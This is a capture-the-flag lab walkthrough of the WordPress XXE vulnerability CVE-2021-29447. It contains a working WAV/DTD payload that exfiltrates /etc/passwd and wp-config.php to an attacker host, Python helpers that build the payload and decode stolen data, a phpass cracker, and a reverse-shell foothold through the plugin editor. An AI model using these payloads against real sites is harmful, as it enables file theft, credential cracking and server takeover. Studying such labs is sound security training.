Wordpress CVE
Description
This walkthrough covers an XXE vulnerability in the WordPress Media Library (CVE-2021-29447), found by the security firm SonarSource. Its impact includes arbitrary file disclosure and server-side request forgery. The room also describes how the vulnerability can be exploited using the WPScan tool.
Warning
The vulnerability can only be exploited when WordPress runs on PHP 8 and the attacker has permission to upload media files (by default, the Author role or above).
To complete the room, we need to find and answer the questions below:
- Use the vulnerability CVE-2021-29447 to read the WordPress configuration file.
- What is the name of the database for WordPress?
- What are the credentials you found? (user:password)
- Enumerate and identify what DBMS is installed on the server.
- What is the DBMS version installed on the server?
- What port is the DBMS running on?
- What is the encrypted password located in the WordPress users table with id 1?
- What is the password in plain text?
- Compromise the machine and locate flag.txt
Scanning
- Assigned IP address: 10.10.234.15
- Open Ports:

PORT | SERVICE | DESCRIPTION
---|---|---
22/tcp | ssh | OpenSSH 7.2p2 Ubuntu 4ubuntu2.10
80/tcp | http | Apache httpd 2.4.18 (Ubuntu), WordPress 5.6.2
3306/tcp | mysql | MySQL REDACTED-0ubuntu0.16.04.1

- Nmap Report:

```text
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-23 08:31 EST
Nmap scan report for 10.10.234.15
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f065b842b7c3ba8efee43ccd57f1292e (RSA)
|   256 421e1b8f1938992e3670cf0eb6319214 (ECDSA)
|_  256 8e8943de5d9b9966c42a9317f30ee1f4 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Tryhackme – Just another WordPress site
|_http-generator: WordPress 5.6.2
|_http-server-header: Apache/2.4.18 (Ubuntu)
3306/tcp open  mysql   MySQL REDACTED-0ubuntu0.16.04.1
| ssl-cert: Subject: commonName=MySQL_Server_REDACTED_Auto_Generated_Server_Certificate
| Not valid before: 2021-05-26T21:23:31
|_Not valid after:  2031-05-24T21:23:31
| mysql-info:
|   Protocol: 10
|   Version: REDACTED-0ubuntu0.16.04.1
|   Thread ID: 93
|   Capabilities flags: 65535
|   Some Capabilities: SupportsTransactions, Support41Auth, Speaks41ProtocolOld, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, InteractiveClient, LongColumnFlag, SwitchToSSLAfterHandshake, IgnoreSigpipes, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, FoundRows, ODBCClient, SupportsCompression, LongPassword, Speaks41ProtocolNew, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: Av2C[)\x12R\x12N-<\x1BIw\x1F\x1E\x13g_
|_  Auth Plugin Name: mysql_native_password
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.21 seconds
```
Exploiting CVE-2021-29447
CVE-2021-29447 is an authenticated XXE in the Media Library that affects WordPress running on PHP 8. When an audio file is uploaded, WordPress reads its metadata, and the iXML chunk of a WAV file is handed to an XML parser; because PHP 8 deprecated libxml_disable_entity_loader(), the guard WordPress relied on to block external entities is not applied there. To exploit this, I followed the instructions provided and created a WAV file whose iXML chunk carries a DOCTYPE pointing at a DTD on my host. It is uploaded in the WordPress dashboard under the media library section.
This can be created as follows:
payload.wav File Payload
```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.17.3.217:8000/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```
Two details matter here. The `'"'"'` sequence closes the single-quoted string, emits a literal single quote from inside double quotes, and reopens it, so the DTD URL ends up wrapped in single quotes inside the XML. The `\x7b` (123) after `iXML` is the little-endian length of the chunk and matches this exact URL; a different attacker IP or DTD filename changes the length, so adjust it if you change either. `echo -en` relies on a bash/GNU echo that understands `\x` escapes.
Once the file is uploaded, the XML parser fetches NAMEEVIL.dtd from my HTTP server and evaluates it, which gives me the XXE. The DTD I wrote for this reads /etc/passwd through a php://filter wrapper (deflate, then base64, so the file travels as one URL-safe token) and then defines a second entity that sends the result back to the same server as a query parameter:
NAMEEVIL.dtd
```xml
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.17.3.217:8000/?p=%file;'>" >
```
The `&#x25;` is an escaped `%`: `%file;` is expanded while `init` is being defined, but `trick` must only become a parameter entity when `%init;` is processed in the document, which is why the two-step indirection is needed. The callback shows up in the HTTP server log as a GET /?p=... request; base64-decoding and inflating that value gave me /etc/passwd, confirming the vulnerability was exploitable.
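The one-liner above hard-codes both RIFF size fields, and the callback has to be decoded by hand. The following is an added example (not code from the room, WPScan or SonarSource) that builds the same WAV carrier with the sizes computed as the RIFF format defines them, parses the result back to check it, and decodes what the DTD trick sends. The function names are mine; the DTD URL is the one used on this page; the /etc/passwd snippet and the http.server log line are constructed. It assumes, as is the case, that PHP's `zlib.deflate` filter emits a raw DEFLATE stream (a zlib/gzip-wrapped fallback is included in case a different filter chain is used).

```python
"""CVE-2021-29447 helpers: build the WAV carrier with correct RIFF sizes, check it,
and decode what the NAMEEVIL.dtd trick sends back.

Added example, not code from the room, WPScan or SonarSource. DTD_URL is the
attacker host from this page; SAMPLE_PASSWD and SAMPLE_LOG are constructed.
"""
import base64
import re
import struct
import zlib
from urllib.parse import unquote

DTD_URL = "http://10.17.3.217:8000/NAMEEVIL.dtd"  # attacker host used on this page


def build_wav_payload(dtd_url: str) -> bytes:
    """Minimal RIFF/WAVE file whose iXML chunk carries the external-DTD DOCTYPE.

    The page's one-liner hard-codes the size fields (0xb8, 0x7b), which only fit
    one URL length; here both are computed. The chunk is the last one in the
    file, so no pad byte is needed even when its length is odd.
    """
    xml = (
        '<?xml version="1.0"?>'
        "<!DOCTYPE ANY[<!ENTITY % remote SYSTEM '" + dtd_url + "'>"
        "%remote;%init;%trick;]>"
    ).encode() + b"\x00"                      # trailing NUL, as in the public PoC
    ixml = b"iXML" + struct.pack("<I", len(xml)) + xml
    riff_size = 4 + len(ixml)                 # 'WAVE' form type + everything after it
    return b"RIFF" + struct.pack("<I", riff_size) + b"WAVE" + ixml


def parse_wav_chunks(data: bytes) -> dict:
    """Walk the chunk list and return {chunk_id: payload}; rejects a bad RIFF size."""
    if data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    if struct.unpack("<I", data[4:8])[0] != len(data) - 8:
        raise ValueError("RIFF size field does not match file length")
    chunks, pos = {}, 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4].decode("ascii")
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        chunks[cid] = data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)          # chunks are word-aligned
    return chunks


def exfil_from_log_line(line: str) -> str:
    """Pull the p= value out of a `python3 -m http.server` access-log line.

    Deliberately not parse_qs(): that turns the '+' of base64 into a space.
    """
    m = re.search(r'"GET /\?p=([^ "]+) HTTP', line)
    if not m:
        raise ValueError("no p= parameter in log line")
    return unquote(m.group(1))


def decode_exfil(p: str) -> str:
    """Undo php://filter/zlib.deflate/read=convert.base64-encode: base64, then DEFLATE."""
    raw = base64.b64decode(p.replace(" ", "+"))   # repair '+' if something already form-decoded it
    try:
        return zlib.decompress(raw, -zlib.MAX_WBITS).decode()       # raw DEFLATE (what zlib.deflate emits)
    except zlib.error:
        return zlib.decompress(raw, zlib.MAX_WBITS | 32).decode()   # zlib/gzip-wrapped fallback


def php_deflate_b64(text: str) -> str:
    """Attacker-side mimic of the DTD's filter chain, used to round-trip a sample offline."""
    c = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    return base64.b64encode(c.compress(text.encode()) + c.flush()).decode()


# Constructed sample: a short /etc/passwd and the log line its exfiltration would produce.
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
SAMPLE_LOG = '10.10.234.15 - - [23/Feb/2023 08:40:12] "GET /?p=%s HTTP/1.1" 200 -' % php_deflate_b64(SAMPLE_PASSWD)

if __name__ == "__main__":
    wav = build_wav_payload(DTD_URL)
    with open("payload.wav", "wb") as f:
        f.write(wav)
    print("iXML chunk bytes:", len(parse_wav_chunks(wav)["iXML"]))
    print(decode_exfil(exfil_from_log_line(SAMPLE_LOG)))
```

Serve NAMEEVIL.dtd from the directory where the listener runs (for example `python3 -m http.server 8000`, as assumed by the log format above), upload payload.wav, and paste the `p=` value from the request line into `decode_exfil`. For the page's URL the computed chunk length is 123, the same `\x7b` the one-liner hard-codes, which is a quick way to confirm the two agree.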
Exploiting Wordpress
The next step is to turn the same primitive on the WordPress site on port 80 and read its wp-config.php, which satisfies the first objective of the room:
- Use the vulnerability CVE-2021-29447 to read the WordPress configuration file.
wp-config.php holds sensitive data such as the database credentials, which can be used to penetrate the system further. I reused the technique above, replacing the first line of the DTD with one that targets the config file at its default install path:
```xml
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/html/wp-config.php">
```
The decoded Base64 file answers the next two questions; in the default wp-config.php layout they sit on these lines:
- What is the name of the database for WordPress?
Line 23 (the DB_NAME define)
- What are the credentials you found? (user:password)
Lines 26 & 29 (the DB_USER and DB_PASSWORD defines)
Gaining ADMIN account
After obtaining the database credentials, I logged in to MySQL, which the scan had shown listening on port 3306. Alongside the default schemas there was one application database, REDACTED, holding the WordPress tables, including the users table:
```text
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| REDACTED           |
+--------------------+

MySQL [(none)]> use REDACTED;
Database changed

MySQL [REDACTED]> show tables;
+-----------------------------+
| Tables_in_REDACTED          |
+-----------------------------+
| REDACTED_commentmeta        |
| REDACTED_comments           |
| REDACTED_links              |
| REDACTED_options            |
| REDACTED_postmeta           |
| REDACTED_posts              |
| REDACTED_term_relationships |
| REDACTED_term_taxonomy      |
| REDACTED_termmeta           |
| REDACTED_terms              |
| REDACTED_usermeta           |
| REDACTED                    |
+-----------------------------+
```
I then queried the REDACTED users table and retrieved the administrator's username and password hash. This was crucial, as the account I had so far could not reach the rest of the WordPress features; with the admin's credentials I can carry out more advanced attacks to get a shell.
One of the rows in the REDACTED users table (ID, user_login, user_pass, user_nicename, user_email):
```text
| 1 | corp-001 | REDACTED | corp-001 | corp-001@fakemail.com
```
I investigated the hash type and found it was phpass, the portable scheme WordPress uses for user_pass, recognisable by its `$P$` (or `$H$`) prefix; hashcat mode 400 covers it, so I cracked it with hashcat.
Cracking Password
```bash
hashcat -a 0 -m 400 'REDACTED' ~/rockyou.txt
```
```text
[REDACTED]:[REDACTED]
```
This section answered the following questions:
- Enumerate and identify what DBMS is installed on the server.
MySQL
- What is the DBMS version installed on the server?
REDACTED
- What port is the DBMS running on?
3306
- What is the encrypted password located in the WordPress users table with id 1?
REDACTED
- What is the password in plain text?
REDACTED
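To make clear what hashcat -m 400 is actually computing, here is an added example (not the room's, hashcat's or WordPress's code) that implements the phpass portable hash: it splits a `$P$` string into cost, salt and digest, recomputes the iterated MD5, and checks candidates from a wordlist the way the hashcat run above does. The function names are mine; the test vector `$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0` / `test12345` is the one shipped with phpass; the wordlist is constructed.

```python
"""phpass ("portable") hash check, the scheme behind hashcat -m 400 and the
WordPress user_pass column. Added example, not the room's or hashcat's code.

PHPASS_VECTOR is the known test vector from phpass; WORDLIST is constructed.
"""
import hashlib
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

PHPASS_VECTOR = "$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0"   # phpass test vector for "test12345"
WORDLIST = ["password", "admin123", "corp-001", "test12345", "letmein"]  # constructed


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant (not RFC 4648): low 6 bits first, no padding."""
    out, i = "", 0
    while i < count:
        value = data[i]
        i += 1
        out += ITOA64[value & 0x3F]
        if i < count:
            value |= data[i] << 8
        out += ITOA64[(value >> 6) & 0x3F]
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out += ITOA64[(value >> 12) & 0x3F]
        if i >= count:
            break
        i += 1
        out += ITOA64[(value >> 18) & 0x3F]
    return out


def parse_phpass(stored: str) -> dict:
    """Split a $P$/$H$ hash into prefix, iteration count, 8-char salt and 22-char digest.

    WordPress stores '$P$B...' : 'B' is ITOA64 index 13, i.e. 2**13 = 8192 MD5 rounds.
    """
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("cost out of range")
    return {"prefix": stored[:3], "iterations": 1 << count_log2,
            "salt": stored[4:12], "digest": stored[12:]}


def phpass_hash(password: str, setting: str) -> str:
    """Recompute the hash for `password` under the prefix+cost+salt of `setting`."""
    p = parse_phpass(setting)
    pw = password.encode()
    h = hashlib.md5(p["salt"].encode() + pw).digest()
    for _ in range(p["iterations"]):          # iterated MD5 is the entire work factor
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def phpass_check(password: str, stored: str) -> bool:
    """True when `password` reproduces `stored` (same cost and salt)."""
    return phpass_hash(password, stored) == stored


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """What `hashcat -a 0 -m 400` does: try each candidate until one verifies."""
    for word in wordlist:
        if phpass_check(word, stored):
            return word
    return None


if __name__ == "__main__":
    print(parse_phpass(PHPASS_VECTOR))
    print("cracked:", crack(PHPASS_VECTOR, WORDLIST))
```

The cost digit is worth reading before you start a long run: a WordPress `$P$B` hash costs 8192 MD5 calls per candidate, so wordlist size, not GPU speed, is what dominates; phpass with a cost of `$P$9` (2048 rounds) as in the test vector is four times cheaper. Identifying the format by its prefix is the same check hashcat performs when you pick `-m 400`.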
Initial Foothold
To get a shell, I logged in to WordPress as the corp-001 admin account and began exploring the plugin feature. Initially I attempted an arbitrary file upload by installing a vulnerable gallery plugin, but those attempts failed.
I then deactivated that plugin and edited one of its PHP files in the dashboard, replacing the contents with my custom PHP reverse shell code, so that requesting the file gave me a reverse shell and remote control of the system. This built-in file editor is only available when wp-config.php does not set DISALLOW_FILE_EDIT, which is the first thing to check if the editor is missing from the dashboard.
And the last question was answered:
- Compromise the machine and locate flag.txt